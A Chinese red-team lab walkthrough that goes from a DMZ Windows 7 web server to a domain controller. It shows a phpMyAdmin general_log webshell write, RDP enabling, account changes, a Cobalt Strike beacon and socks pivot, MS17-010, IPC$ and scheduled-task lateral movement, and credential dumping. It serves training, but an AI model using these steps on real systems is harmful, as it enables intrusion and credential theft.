红队靶场内网渗透(从DMZ主机渗透到域内机器)

2023-11-12

目录

一、红队靶场内网渗透

1.靶机工具下载

2.本实验网络拓扑图

3.内网渗透攻击流程

二、环境搭建

1.DMZ区win7  

2.内网办公区

3.域控主机 

 三、开始攻击

1.DMZ区win7渗透

1.1信息收集:

1.2收集到的信息

1.3远程web网站的原理

总结:

2.内网办公区渗透(域内主机)

2.1 上线到CS

2.2MSF监听端口

2.3搭建socks隧道 

 总结:

 3.域环境渗透(域控)

3.1域环境的概念

3.2确定域 

3.4通过CS上线不出网机器

3.5建立 IPC进程间通信连接

3.6横向移动 

总结:


一、红队靶场内网渗透

1.靶机工具下载

链接:https://pan.baidu.com/s/1LgWAHK3XPp2Q9CG6QVdxuw 
提取码:kiss

win7虚拟机登录密码:hongrisec@2019

2.本实验网络拓扑图

本实验要实现内网渗透, 我们不能直接渗透内网服务器和内网办公区,因为网都不通。

        我们可以通过DMZ区的计算机进行下手渗透,DMZ区的会和内网办公区有一定联系,DMZ区的计算机我们可以做为跳板,做隧道技术(DNS ICMP SOCKS HTTP SSH)连接到内网办公区,而办公区和服务器区有一定联系,这样我们进而就可以攻入内网。

DMZ区一台计算机win7

内网办公区一台计算机win2003

内网服务器一台计算机win2008

我们需要攻击机kali namp 蚁剑 等工具

 3.内网渗透攻击流程

信息收集:ip 域名 子域名 目录 CDN whois 语言 框架 邮箱 架构 结构

漏洞利用:常见:SQL XSS XXE CSRF rce 上传  中间件:spring struts fastjon 历史漏洞。。。

权限提升:权限提升至root管理员权限

权限维持:在目标上安装了一个后门,目的是保证自己的权限不会掉,一直控制住目标.

内网代理:搭建代理或者建立隧道,去探测访问处于内网中的机器.

内网收集:本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。

内网漏洞:利用工具(MSF Nessus nmap)获取到主机的相关漏洞信息

横向移动:攻击者在内部网络获得访问权限,通过扫描,爆破,smb传递等技术扩大权限并在受危害的网络环境中移动的行为。

跨域攻击:常规渗透方法 (利用web漏洞跨域获取权限) 利用已知域散列值进行 哈希传递攻击 或 票据攻击

痕迹清理:清除系统日志,绕过日志,清除操作痕迹。

二、环境搭建

1.DMZ区win7  

win7虚拟机

本虚拟机充当web服务器,需要双网卡,分别是192.168.52.143 和 192.168.111.128

Vm3  192.168.52.0  充当内网网段

Vm4  192.168.111.0  充当公网网段

 打开win7虚拟机,设置,添加一个网卡,调成自定义,VMnet3和VMnet4.

 win7虚拟机开机,打开网络适配,本地连接:第一张网卡

 本地连接4:第二张网卡

 打开phpstudy环境

2.内网办公区

win2k3,配置网络vm3,ip配成192.168.52.141

 win7 ping一下 win2k3 可以ping通 证明环境没问题

攻击机kali 需要双网卡 vm4充当公网(192.168.111.xxx)

因为这样配置kali可以访问到DMZ中的win7,然后win7与内网有一定联系,可做进一步的渗透。

kali ping通win7 192.168.111.128 证明环境配置成功 

3.域控主机 

win 2008 网卡 VM3(192.168.52.xxx)

 ip配置成192.168.52.138

 win7 ping win2008

win7用域用户GOD登录

ping god.org

net user /domain

如果使用stu1用户的话 查看域用户net user /domain是查不到的 需要在god用户下查看

 三、开始攻击

1.DMZ区win7渗透

目的:把这个电脑通过远程桌面控制下来。

1.1信息收集:

1.ip 端口 目录 网站开发语言 whois 邮箱 手机 公司结构 子域名 。。。

知道ip地址:

1.扫描端口(namp)

 扫出来一些端口

访问一下80端口

 phpStudy 探针 在原先的phpinfo基础上做了一些变化。在开发过程中,我们常常需要服务器的各项配置,而“探针”就是就是用来探测配置的。

发现web服务(dirsearch  御剑。。。)

1.扫描目录

2.扫描后台

 我们访问beifen.rar 把文件下载下来。

phpinfo.php页面

 phpmyadmin页面

用phpmyadmin爆破工具 先把网站复制到txt文档里面。

 导入刚才的txt文档,开始爆破:

 用户名和密码均是root,进入页面

1.2收集到的信息

1.发现80端口是一个探针,好像也没办法利用。

2.发现web系统有一个beifen.rar文件

3.发现web系统有一个phpinfo页面

4.发现web系统有一个phpmyadmin页面(数据库管理界面)

1.3远程web网站的原理

1.需要向服务器的文件中写入木马(大马 小马  一句话木马  内存马 免杀马 等等。。)

2.<?php eval($_POST[1]); ?>

3.怎么写呢?sql注入  文件上传  框架漏洞。。。。 就是通过漏洞写进去的。

Phpmyadmin  getshell 的技巧

  1. 发现是phpmyadmin的口令是root/root

phpMyAdmin 写 shell

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:

# 查看当前配置

SHOW VARIABLES LIKE 'general%';

在SQL里面执行语句:

 日志在C:\phpStudy\MySQL\data\stu1.log目录下保存

# 更改日志文件位置

set global general_log = "ON";

set global general_log_file='C:/phpStudy/WWW/l.php';

我们的路径是phpstudy探针的路径,这样日志就写入到了探针路径,我们就可上传木马,进行攻击

 

 在次查看配置

# 往日志里面写入 payload

select '<?php eval($_POST[1]); ?>';

查看一下探针页面,底部发现:

 蚁剑连接:

输入ip,连接密码是我们写的木马 1

 打开虚拟终端,输入whoami 查看用户  ipconfig 查看ip

 我们要远程登录桌面,所以要保证3389端口是开着的,命令如下:

  1. 开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 net user 查看用户

远程连接192.168.111.128 发现需要密码

我们有两种方法:1.更改用户密码 2.添加一个新用户

net user administrator admin@123  #更改密码

net user administrator /active:yes #激活密码

net user username password  /add  #新建用户

 发现一直连接中,

 出现这个页面,

点击是

 发现在win7虚拟机上有远程连接验证

 我们在蚁剑上关机重启电脑:

shutdown -r -t 0

 在开机时远程连接  连接成功!!!

总结:

第一台靶机拿下,这里我们用到的是 信息收集 和 漏洞利用。

信息收集:通过ip扫到了开放端口,通过端口我们发现了phpmyadmin页面 phpstudy探针 。

漏洞利用:在phpmyadmin页面利用getshell写入一句话木马,用蚁剑进行连接,创建用户或更改密码进行远程桌面连接,拿下DMZ区的计算机。

2.内网办公区渗透(域内主机)

我们想要进入内网,如果直接进入,是行不通的,网络都不在同一段中,所以,我们要利用win7作为跳板来进入域内主机win2003

本机ping win2003 肯定是ping不通的

蚁剑 win7 ping 通 win2k3 证明配置没问题

 拿到webshell之后,一般会将机器上线到cs和msf(后渗透)

MSF是命令行  CS是MSF的图形化界面

MSF CS (因为这两个工具集成了一键提权 开代理 做隧道 扫描等等)

kali中添加一个网卡vm4(192.168.111.130)

kali ping win7(192.168.111.128)通 证明环境没问题 

2.1 上线到CS

1.在kali中运行服务端  bash teamserver kali ip(192.168.111.130) 密码(123456)

 2.运行客户端 bash cobaltstrike.sh

ip 是 kali的ip post是刚刚运行服务器端的端口9081 密码是123456

 3.生产一个监听器

 add添加 名字随意 端口写个不常见的就行。

 木马连接到监听器上,监听器返回服务端,服务端的内容在此页面上。

4.生成木马

 连接到监听器kiss

 保存到桌面,起个名字

5.把MSB.exe用蚁剑上传至win7

 dir查看  MSB.exe运行

 返回kali,成功上线

 Session的sleep改为1,响应1秒

 

 进入命令行

查看命令  shell whoami  ipconfig

 

 查看路由 shell route print

 查看arp,内网地址ip 发现目标ip

ping192.168.52.141(win2k3) 肯定是ping通的

 

2.2MSF监听端口

 

 CS添加一个监听msf

 Spawn 发送到msf

 发现meterpreter 攻击成功!!! 这样msf也渗透到了win7

2.3搭建socks隧道 

右键Rivoting   Socks server 

设置端口34456(端口)

 隧道开启成功

查看隧道信息

 点击Tunnel 生成代码

复制代码链接

setg Proxies socks4:192.168.111.130:34456

在msf中backgroud返回

设置msf隧道 通向192.168.111.130 端口是34456

 现在我们msf就可以打内网了

查看win2k3是否存在永恒之蓝漏洞

 序号3对应的是查看是否存在永恒之蓝漏洞

use 3  #使用序号3
show options  #查看配置内容
set rhosts 192.168.52.141  #设置目标地址
run #运行

 发现win 2003 存在永恒之蓝漏洞

 我们利用 0 ms17_eternablue发现跑不起来 可能是系统太老了 

 但是我们可以利用use 2 cmd

查看 whoami

 

查看 ip地址 ipconfig 

 总结:

1.将域控的主机上线到CS和MSF

2.搭建socks代理

3.通过MSF连接代理控制内网2003的主机

 3.域环境渗透(域控)

3.1域环境的概念

win7计算机名称 和工作组 域

 我用公司 学校来介绍理解 工作组 和 域

工作组:对电脑进行分组,方便管理员去管理。

比如一个公司有100个人(100台电脑)公司分出来好几个部门有 人事部 运维部 财务部 IT部等等

这样的话有什么弊端???

没有纪律性 没统一管理得机制。

比如小k在IT部门工作,可喜欢的小姐姐在人事部,明天小k直接去人事部工作。

经理让所有员工的电脑换成企业文化壁纸 不能有a软件,可小k不听 偏不换壁纸 偏就下a软件。

这样 域概念 就出现了

在域种加入网络管理员 (类似学生班主任):统一管理的作用(域控制器)

域内机:好比 员工(学生)

网络管理员在一台电脑上,让员工用什么壁纸就用什么壁纸,让有什么软件就有什么软件,让什么时候关机就什么时候关机,还有设置密码 统一管理等等。

高一1班(火箭班:域名)

班主任(领导人):域控

学生:域内机器

注意:一个电脑只能加入一个域。好比一个学生只能加入一个班级。

一个域里面可以有多个域控。好比一个班级不止有班主任一个老师。

非常重要

本地用户(土著人):就是在本地上的用户(账号和密码都存在本地的机器上)

域用户:就是加入域的用户(就是账号和密码存在域控上)一般是企业加域 个人家用不加域

找域控  怎么看有没有域

怎样加入域???

主机电脑 DNS首选 域服务器的ip 然后在计算机属性 填写要加入的域名 输入域服务器的账号密码 最后加入域。

域服务器可以添加用户 设置密码 从而可以登录到主机电脑。

win7DMZ主机

God\administrator   域控用户

Stu1\administrator   本地用户

3.2确定域 

在kali上shell whoami 查看用户为god,此时,我们也不知道他是不是域控用户,此刻,我们用

shell hostname 查看计算机名称 返回stu1 如果是本地用户,肯定是stu1\xxx,所以猜测god为域控用户。

或者,更为直接简单的方法 shell ipconfig/all  可以清楚看到主机名stu1 dns后缀为god.org

3.3域内信息收集 

 查询域控在哪里?

nslookup -type=SRV _ldap._tcp

查看到域控的ip 192.168.52.138 (win2008) 域控的名字owa 域名地址god.org

 查询域种有多少用户

net user /domain

这些用户都是在域控上面的 

 查询域中有多少电脑

net group "domain computers" /domain

stu1是我们控制的电脑 

 查询域控名字

net group "Domain Controllers" /domain

OWA 

3.4通过CS上线不出网机器

生成一个监听器

生成木马文件 

生成了木马(可以上线不出网的木马)

木马怎么传到域控上呢???

查看域控管理员的密码

3.5建立 IPC进程间通信连接

IP和密码都是域控win2008的

shell net use \\192.168.52.138\ipc$ "GODl123" /user:god\administrator

 shell net use  #查看连接

 现在已经和域控建立了一个连接,证明已经相互信任了,可以传文件了。

查看一下 

把文件复制到域控电脑上

copy beacon.exe \\192.168.52.138\c$

 

 win2008 域控主机

 创建一个远程计划任务

schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f

运行

schtasks /run /s 192.168.52.138 /i /tn "test"

 

 连接

connect(link)目标ip 192.168.52.138

 查看域控 whoami ipconfig

 

 查看密码(因为我域控win2008和跳板win7设置密码是一样的)

 命令查看 logonpasswords

 降权 system降为administrator

shell schtasks /create /s 192.168.52.138 /tn test1 /sc onstart /tr c:\beacon.exe /ru administrator /f  #创建 目标ip 文件名test 木马beacon.exe 用户administrator

shell schtasks /run /s 192.168.52.138 /i /tn "test1"   #运行 
connect(link) 192.168.52.138

3.6横向移动 

其实cs集成了一键连接

域内一键连接域控主机

.138是域控

这样直接上线域控 

 域控主机控制域内主机

我们要上线win2k3  192.168.52.141

 上线win2003成功

总结:

1.确定域用户和本地用户,域内进行信息收集。

2.通过CS上线不出网机器,生产木马,查看域密码,建立IPC通信连接。

3.横向移动,域控主机与域内主机的相互渗透。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

红队靶场内网渗透(从DMZ主机渗透到域内机器) 的相关文章

  • Linux终端常见用法总结

    熟悉Linux终端的基础用法和常见技巧可以极大提高运维及开发人员的工作效率 笔者结合自身学习实践 总结以下终端用法供同行交流学习 常 见 用 法 1 快捷键 1 1 Alt 在光标位置插入上一次执行命令的最后一个参数 1 2 Ctrl R
  • 2种方法,教你使用Python实现接口自动化中的参数关联

    通常在接口自动化中 经常会参数关联的问题 那么什么是参数关联 参数关联就是上一个接口的返回值会被下一个接口当做参数运用 其中Python中可以实现参数关联的方法有很多种 今天小编给大家介绍下 如何通过Python来实现接口自动化中的参数关联
  • 白帽子如何快速挖到人生的第一个漏洞 | 购物站点挖掘商城漏洞

    本文针对人群 很多朋友们接触安全都是通过书籍 网上流传的PDF 亦或是通过论坛里的文章 但可能经过了这样一段时间的学习 了解了一些常见漏洞的原理之后 对于漏洞挖掘还不是很清楚 甚至不明白如何下手 可能你通过 sql labs 初步掌握了sq
  • messages,CentOS 7不收集日志或不存在 /var/log/messages

    var log message var log secure等都不记录了 并且都是空文件 重启机器 reboot 无效 重启日志 systemctl start rsyslog 无效 怀疑空间不足 删除 var log messages 重
  • 2024年金三银四网络安全考试试题

    2023年金三银四网络安全考试试题 1 关于数据使用说法错误的是 A 在知识分享 案例中如涉及客户网络数据 应取敏感化 不得直接使用 B 在公开场合 公共媒体等谈论 传播或发布客户网络中的数据 需获得客户书面授权或取敏感化 公开渠道获得的除
  • Jmeter 性能-并发量计算

    并发概念 指网站在同一时间访问的人数 人数越大瞬间带宽要求更高 服务器并发量分为 业务并发用户数 最大并发访问数 系统用户数 同时在线用户数 估算业务并发量的公式 C nL T C C 3 C的平方根 说明 C是平均的业务并发用户数 n是l
  • 200道网络安全常见面试题合集(附答案解析+配套资料)

    有不少小伙伴面临跳槽或者找工作 本文总结了常见的安全岗位面试题 方便各位复习 祝各位事业顺利 财运亨通 在网络安全的道路上越走越远 所有的资料都整理成了PDF 面试题和答案将会持续更新 因为无论如何也不可能覆盖所有的面试题 php爆绝对路径
  • 远程控制软件安全吗?一文看懂ToDesk、RayLink、TeamViewer、Splashtop相关安全机制_raylink todesk

    目录 一 前言 二 远程控制中的安全威胁 三 国内外远控软件安全机制 ToDesk RayLink Teamviewer Splashtop 四 安全远控预防 一 前言 近期 远程控制话题再一次引起关注 据相关新闻报道 不少不法分子利用远程
  • 【网络安全】Facebook代码执行实现命令执行、敏感信息泄露

    部分网站开设编码练习 若安全配置不当 则代码执行将升级为操作系统命令注入 导致敏感信息泄露 本文仅分享命令执行相关知识 不承担任何由于传播 利用本文所发布内容而造成的任何后果及法律责任 未经许可 不可转载 文章目录 信息泄露 扩大危害 信息
  • 步骤详图 教你在linux搭建容器环境

    警告 切勿在没有配置 Docker YUM 源的情况下直接使用 yum 命令安装 Docker 1 准备工作 系统要求 要安装Docker CE 社区版 操作系统的最低要求是CentOS7 7以下版本都不被支持 卸载旧版本 Docker改版
  • Vue 如何使用WebSocket与服务器建立链接 持续保持通信

    WebSocket 浏览器通过JavaScript向服务器发出建立WebSocket链接的请求 链接建立后 客户端和服务器端就可以通过TCP链接直接交互数据 WebSocket链接后可以通过 send 方法来向服务器发送数据 并通过 onn
  • Kubernetes (十三) 存储——持久卷-动静态分配

    一 简介 二 NFS持久化存储步骤 静态分配 1 集群外主机用上次nfsdata共享目录中创建用来测试的pv 1 3 目录 用来对三个静态pv 2 创建pv的应用文件 vim pv yaml apiVersion v1 kind Persi
  • 全网最全(黑客)网络安全自学路线!熬夜两周整理(巨详细)

    学网络安全有什么好处 1 可以学习计算机方面的知识 在正式学习网络安全之前是一定要学习计算机基础知识的 只要把网络安全认真的学透了 那么计算机基础知识是没有任何问题的 操作系统 网络架构 网站容器 数据库 前端后端等等 可以说不想成为计算机
  • UI自动化测试之Jenkins配置

    背景 团队下半年的目标之一是实现自动化测试 这里要吐槽一下 之前开发的测试平台了 最初的目的是用来做接口自动化测试和性能测试 但由于各种原因 接口自动化测试那部分功能整个废弃掉了 其中和易用性有很大关系 另外 也和我们公司的接口业务也有关
  • 【无标题】

    大家都知道该赛项的规程和样题向来都是模棱两可 从来不说具体的内容 导致选手在备赛时没有头绪 不知道该怎么训练 到了赛时发现题目和备赛的时候完全不一样 那么本文将以往年信息安全管理与评估赛项经验来解读今年2023年国赛的规程 帮助选手们指明方
  • ESP10B 锁定连接器

    ESP10B 锁定连接器 ESP10B 电机新增内容包括双极型号标准 NEMA 尺寸 17 23 和 34 的步进电机现在包括输出扭矩范围从 61 盎司英寸到 1291 盎司英寸的双极型号 该电机配有带锁定连接器的尾缆 可轻松连接 每转可步
  • 【方法】如何把Excel“只读方式”变成可直接编辑?

    Excel在 只读方式 下 编辑后是无法直接保存原文件的 那如何可以直接编辑原文件呢 下面来一起看看看吧 如果Excel设置的是无密码的 只读方式 那在打开Excel后 会出现对话框 提示 是否以只读方式打开 如果想直接编辑文件 选择 否
  • 2023下半年软考「单独划线」合格标准公布

    中国计算机技术职业资格网发布了 关于2023年度下半年计算机软件资格考试单独划线地区合格标准的通告 2023下半年软考单独划线地区合格标准各科目均为42分 01 官方通告 关于2023年度下半年计算机软件资格考试单独划线地区合格标准的通告
  • 【安全】使用docker安装Nessus

    目录 一 准备docker环境服务器 略 二 安装 2 1 搜索镜像 2 2 拉取镜像 2 3 启动镜像 三 离线更新插件 3 1 获取challenge 3 2 官方注册获取激活码 3 3 使用challenge码和激活码获取插件下载地址
  • 网络安全行业热门认证证书合集

    网络安全认证证书 就和学历一样是敲门砖 拿到了可以用不到 但不能没有 技术大牛可以没有证书 但普通人不能没有 1 初级入门 就像学历在职场上展示一个人的基本素养一样 网络安全认证证书可以展示一个人在网络安全领域具备的基本知识和技能 它为初学

随机推荐

  • python面向对象编程 类与实例 继承与多态 isinstance

    class Student object def init self name gender self name name self gender gender def set gender self gender if gender ma
  • C语言学习

    目录 原码反码和补码 原码 true code 反码 complemental code 补码 ones complement code 溢出的处理 位运算符 移位操作符 lt lt gt gt lt lt 左移 gt gt 右移 按位操作
  • 2023深圳杯 C题无人机协同避障航迹规划 最新论文

    完整论文已发布 目录 无人机协同避障航迹规划 摘要 一 问题重述 1 1 背景 1 2 重述 二 模型的假设 三 符号说明 四 问题分析 4 1 问题一分析
  • IDEA 打开SpringBoot服务控制台,管理多个服务

    IDEA 打开SpringBoot服务控制台 管理多个服务 作者简介 努力的clz 一个努力编程的菜鸟 文章专栏 软件使用技巧 记录一下平时开发过程中 使用各种 编程软件 的一些使用技巧 实现步骤如下 第一步 选择 视图 工具窗口 服务 第
  • 传统数据库也能实现区块链存储

    2019独角兽企业重金招聘Python工程师标准 gt gt gt 本文节选自电子书 Netkiller Architect 手札 延伸阅读 Netkiller Blockchain 手札 微信订阅号 netkiller ebook 微信扫
  • shell脚本:函数

    shell脚本 函数 一 函数 1 定义 2 作用 3 格式 二 函数传参 1 定义 2 函数变量 3 递归 4 函数库 一 函数 1 定义 1 将命令序列按格式写在一起 2 可方便重复使用命令 2 作用 1 避免代码重复 2 把大工程分割
  • 2019南邮年微机原理及应用复试真题

    2019南邮年微机原理及应用复试真题 一 填空题 1 46的原码 反码以及补码的十六进制 H H H 2 8254实现日时钟定时的是 号计数器 计数初值 通常输出周期 3 每一个8254中有三个 位计数器 每一个计数器有 种工作方式 4 8
  • MMselfSup训练自监督模型之mocov3

    一 环境搭建 1 创建虚拟环境 conda create name openmmlab python 3 8 y 激活虚拟环境 conda activate openmmlab 2 安装pytorch torchvision 根据自己的配置
  • java 读取excel数据

    本文共介绍两种方式 第一种是常规POI读取 第二种是大文件读取 依赖包
  • AbstractQueuedSynchronizer(AQS) 原理

    一 AQS 简介 1 1 AQS 是什么 AQS AbstractQueuedSynchronizer 抽象队列同步器 是一个用来构建锁和同步器的框架 使用 AQS 能简单且高效地构造出应用广泛的大量的同步器 比如我们提到的 Reentra
  • 高光谱图像处理

    Development of a classification algorithm for efficient handling of multiple classes in sorting systems basesd on hypers
  • ps语义分割_解决实例分割任务中边缘不够精细:PointRend: Image Segmentation as Rendering...

    加入极市专业CV交流群 与6000 来自腾讯 华为 百度 北大 清华 中科院等名企名校视觉开发者互动交流 更有机会与李开复老师等大牛群内互动 同时提供每月大咖直播分享 真实项目需求对接 干货资讯汇总 行业技术交流 关注 极市平台 公众号 回
  • 计算机网络基础知识整理

    计算机网络 用通信设备和线路将处在不同地理位置 操作相对独立的多台计算机连接起来 并配置相应的系统和应用软件 在原本各自独立的计算机之间实现软硬件资源共享和信息传递等功能的系统 计算机网络的功能 数据通信 2 资源共享 3 增加可靠性 4
  • 【技术解析笔记】DDPM解析

    本文为youtube上一个ddpm解析视频的摘录笔记 youtube原视频链接 https www youtube com watch v W O7AZNzbzQ 基本介绍 DDPM指的是Denoising diffusion probal
  • hive - 面试题 - 最近一次购物在一年前(近一年内无购物)

    要求 有表 用户id 订单id 下单日期 该用户符合365天内无交易且当日有交易的数据打标签 如果当天有多条记录 同样打标签 思路 当前订单时间 最近一次的下单时间 gt 365 即最近365天内无订单记录 中间有个问题 一天内多次下单 只
  • 【GCC-RT-Thread】gcc交叉编译 STM32 - RT-Thread

    GCC RT Thread gcc交叉编译 STM32 RT Thread 最近在公司实习 公司想将原来在Windows keil上开发的项目移到Linux 并上RTT操作系统 最近就被安排做了这件事 首先 下载 RT Thread Nan
  • 学习记录396@git clone 只克隆到.git文件

    github上的仓库 但是使用乌龟克隆时只克隆到 git文件和README文件 原因是在我的仓库中 没有选择分支 默认是main分支 但我的项目在master分支 因此加上分支选项处在clone即可 如果是使用命令行clone 需要使用如下
  • python基础 -15- 深浅拷贝

    浅拷贝 data name alex age 18 scores 语文 130 数学 60 英语 98 浅拷贝 data copy data copy 再看一下各自的内存地址 可以发现指向的内存地址不一样 print data的内存地址 i
  • 白盒测试题(13-16道题目+详细代码)

    白盒测试 题 13 根据下列流程图编写程序实现相应分析处理并显示结果 并设计最少的测试数据进行判定覆盖测试 输入数据打印出 输入 x 值 输入 y 值 输出文字 a 和 a 的值 输出文字 b 和 b 的值 其中变量 x y 均须为整型 i
  • 红队靶场内网渗透(从DMZ主机渗透到域内机器)

    目录 一 红队靶场内网渗透 1 靶机工具下载 2 本实验网络拓扑图 3 内网渗透攻击流程 二 环境搭建 1 DMZ区win7 2 内网办公区 3 域控主机 三 开始攻击 1 DMZ区win7渗透 1 1信息收集 1 2收集到的信息 1 3远